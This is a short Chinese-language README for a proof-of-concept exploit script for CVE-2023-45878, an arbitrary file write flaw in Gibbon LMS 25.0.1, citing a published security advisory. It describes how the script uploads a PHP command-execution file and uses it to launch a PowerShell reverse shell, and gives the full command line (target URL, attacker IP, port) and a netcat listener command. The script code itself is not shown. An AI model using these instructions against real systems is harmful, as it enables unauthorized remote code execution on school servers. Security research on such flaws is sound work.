本脚本基于 https://herolab.usd.de/security-advisories/usd-2023-0025/ 的研究编写。该漏洞利用原理是通过 Gibbon LMS 25.0.1 中的任意文件写入漏洞。此PoC将上传一个简单的php命令执行脚本,然后使用该脚本加载一个powershell反向shell。
python3 CVE-2023-45878.py -u http://target.com/Gibbon-LMS -l 10.10.16.2 -p 8888 -f asdf
参数说明:
-u, Gibbon LMS 安装的URL。
-l, 你的IP地址
-p, 你监听的端口
-f, 文件名。如果需要手动测试,此参数很重要。默认值为 "asdf"。
准备好监听器以接收反弹shell。
nc -lvnp 8888